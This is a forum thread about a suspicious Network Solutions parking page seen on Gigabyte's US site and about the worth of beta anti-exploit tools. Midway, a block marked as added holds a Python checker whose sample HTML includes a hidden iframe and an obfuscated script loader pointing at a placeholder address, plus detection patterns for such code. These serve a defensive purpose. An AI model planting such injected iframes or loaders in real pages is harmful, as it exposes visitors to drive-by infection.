
Last night I went to www.gigabyte.us, which is the website for the hardware manufacturer. I was directed to a strange-looking Network Solutions landing page. The guy in the thread on hardforum below got the same thing.

http://hardforum.com/showthread.php?p=1040654103

I thought it was pretty strange, so I started trying to figure out the reasons it would happen. DNS issues came up a lot.

However, I also found out how half a million Network Solutions parked-domain pages were serving malware back in 2010, using iframe injection and drive-by downloads.

I can't get the Network Solutions landing page to come up again. The URLs were www.gigabyte.us and www.gigabyte.com. The site seems back to normal.

Does anyone have any insights into this sort of issue? That's a pretty weird-looking landing page. I'm not sure if it's real or fake, malicious or not.


I don't see anything weird and I don't see a Network solutions "landing page".

 

Wrote too soon. :(

 

Domain expires on 2/12/2023

gigabyte.com.zip

 

The web site is "parked". Maybe the server is down or something "else" such as transitioning to

 

This is the Gigabyte US site

http://www.gigabyte.us

 

This is the Taiwanese site

http://www.gigabyte.tw


Thanks. I have EMET and MBAE as well as MBAM Pro, and they didn't say anything. Ran MBAR too.

Just seemed a bit odd that it would advertise singles and adult chat on a Network Solutions landing page when a graphics card maker's site was parked, lol.

Googling Network Solutions has made me really paranoid now, though. I found on the official NS Facebook page that tons of people who host their sites through NS are currently having DNS and mail issues with them.

And I found out about the old exploit-launching widget that 500,000 of their parked domains were infecting people with in 2010.


Thanks. I have EMET and MBAE as well as MBAM Pro, and they didn't say anything. Ran MBAR too.

MBAR - Means nothing.

MBAE - Means nothing.

 

Results from Beta software can not be used to draw conclusions. MBAE has too many bugs and shouldn't be used unless you are a paid Beta Tester. Using it outside that role will create a False Sense of Security. The proof is YOUR post lauding "...mbae...didnt say anything".

Additionally, if you visit a web page, running MBAR is just not needed. One runs an anti-rootkit application IFF there is cause for suspicion of an actual infection based upon perceived or actual observed misbehaviour.

 

Additionally...

Researchers bypass protections in Microsoft's EMET anti-exploitation tool

 

As for the page actually rendered, that's normal for a page parking a Domain. Nothing but fluff advertisements, so if one does visit the page at least the host gets affiliate revenue if one "clicks" on URLs on said page.

 

Example:

My friend Ian Kenefick (Cork, Ireland) had a web site called Ian Kenefick Computer Security with the Domain IK-CS.Com. It is also "parked" and awaits a buyer. It even states "For Sale, Click For Details". Look at it and you'll see the similarities. Of course, just because the page is a parking page does NOT mean that one of the advertisers *may* not host content not unlike the one you were pissed-off over at Skype.

 

http://ik-cs.com/


David:

 

Thank you for the additional information. I don't let myself have a false sense of security, regardless of what software I'm using. I pretty much don't trust anything or anyone, and hope someone with the required knowledge and skill can analyze the entire source code of that web page.

 

With regard to what software I use, I don't know of anything better at blocking exploits than MBAE, EMET, and always having things like Flash Player and Java updated (Java is disabled for browsers). I try to keep myself protected with stuff that actually works, but I know just about any security software can be defeated, as the article you linked to proves.

 

You make it sound like MBAE and MBAR are useless, because they're in beta, and not to bother using them. From what I've read here, and various other places, they're pretty effective, despite being in beta. Perhaps you can elaborate further as to why I shouldn't use them?

 

Firefox:

 

Yes, I found some weird stuff on their Facebook and blogs indicating problems, but they're very vague and don't give any details. I know they've been compromised by malware before (back in 2010), but I'm not sure what's going on. People who don't have websites with them don't have access to post in their forums, so I can't even find out if the landing page that people going to the Gigabyte site are getting is from them or not.


You don't get it.

 

In reference to Beta software: with something like Audacity you can use it and some things might not function right, but the software will most likely work for the main purpose, manipulation of audio files, with some parts not totally working correctly. But at the same time, because it is Beta, you might spend an hour transforming some waveform and the program crashes, losing all your work. With software that is supposed to protect a system, or protect a system of systems, then it just shouldn't be used. It is like using a Beta version of a prophylactic. It hasn't been thoroughly tested, and under certain circumstances use of said prophylactic can still lead to an unwanted pregnancy.

 

Using an Anti RootKit application in the role you described is like using a voltmeter to test a car battery and then saying the whole car tests OK. The problem is an Anti RootKit application is an On Demand scanner with a specific but small spectrum target range. For example, the web site could use obfuscated JavaScript. Neither MBAE nor MBAR will flag that. MBAE may flag the ACTION of a Buffer Overflow with an Elevation of Privileges, but that is very unlikely in this scenario. Since it is Beta software there is the possibility that if there was such an action then MBAE could fail in that regard BECAUSE it is not fully functional, yet, and that is WHY it is still in beta.

 

EDIT:

 

On the other hand, a more appropriate check would be to use Fiddler and examine the captured code and associated HTTP activity. Of course that is not an automatic scanner that gives a judgmental declaration based on its findings. It requires the user to have a level of knowledge and experience to make a judgment call.

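The kind of offline check described above (capture the page with Fiddler, then inspect what it actually contains rather than trusting a scanner's verdict), as an added example that is not from the thread: a Python triage of a saved parking-page HTML body that flags hidden iframes and obfuscated inline scripts, the two indicators the thread mentions. The sample page, the ad host and the address 198.51.100.7 are constructed for the example.

```python
"""Triage a captured parking-page HTML body (saved from Fiddler or a
browser) for drive-by indicators: hidden iframes and obfuscated scripts."""
import math
import re
from html.parser import HTMLParser

# Constructed sample (not a real page): one ordinary ad iframe, one zero-size
# hidden iframe, one unescape()-driven injected script, one benign script.
SAMPLE_HTML = """<html><body>
<h1>This domain is parked</h1>
<iframe src="https://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://198.51.100.7/x.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//198.51.100.7/a.js%22%3E%3C/script%3E'));</script>
<script>var x = 1; console.log(x);</script>
</body></html>"""

def shannon_entropy(s):
    # Bits per character; long packed or encoded payload strings score high.
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

class PageTriage(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # (kind, detail) tuples
        self._in_script = False
        self._script = ""
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            # Zero/one-pixel or CSS-hidden frames are the classic injection shape.
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append(("hidden_iframe", a.get("src") or ""))
        elif tag == "script":
            self._in_script, self._script = True, ""
    def handle_data(self, data):
        if self._in_script:
            self._script += data
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            code = self._script
            # Decoder calls or unusually dense text suggest obfuscated loaders.
            if re.search(r"\b(eval|unescape|fromCharCode)\s*\(", code) or shannon_entropy(code) > 5.0:
                self.findings.append(("obfuscated_script", code[:60]))

def triage(html):
    parser = PageTriage()
    parser.feed(html)
    return parser.findings       # empty list means nothing matched the heuristics
```

A finding is a reason to look closer at the captured response, not a verdict; ordinary ad frames and minified libraries can also trip the entropy heuristic.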

I understand why beta software isn't preferable to a full release version, but I don't know of any other exploit mitigation than it and EMET that would be better. The condescending tone is unnecessary. Suggestions for alternatives would be appreciated. That's why I'm here.

I understand that the anti-rootkit is only designed to look for rootkits.

That's why I also bought MBAM Pro and update several times daily, have MBAE as well as EMET, and I use a lot of the other tools recommended by experts on this forum. I read reputable security news and try to keep up with new threats.

I do use tools that require some level of knowledge, and I like to learn how to use new ones. I monitor connections with TCPView, and have looked for suspicious activity by using Autoruns and Process Monitor as well as some other Sysinternals tools like Process Explorer with the VirusTotal hash comparison feature enabled, in an attempt to be aware of what's going on. I set up my operating system the most secure way I know how to and constantly look for ways to improve it.

I don't know what Fiddler is, but I am going to figure it out after I post this. Did you find obfuscated JavaScript that does something malicious on that landing page, or was that only an example of what MBAE would miss?

I can't exactly have a FireEye-style virtual machine endpoint on my main PC, so I'm trying to keep it safe using the best practices and software I know. I am not a programmer or a security expert, but I try to be as informed as possible. I know no one is safe with all of the expensive and sophisticated APTs that exist today, with dedicated hardware much worse than NebuAd was. I know that even with the latest full release version endpoint solutions people get compromised. I am open to suggestions and I'm here to learn, as I said.
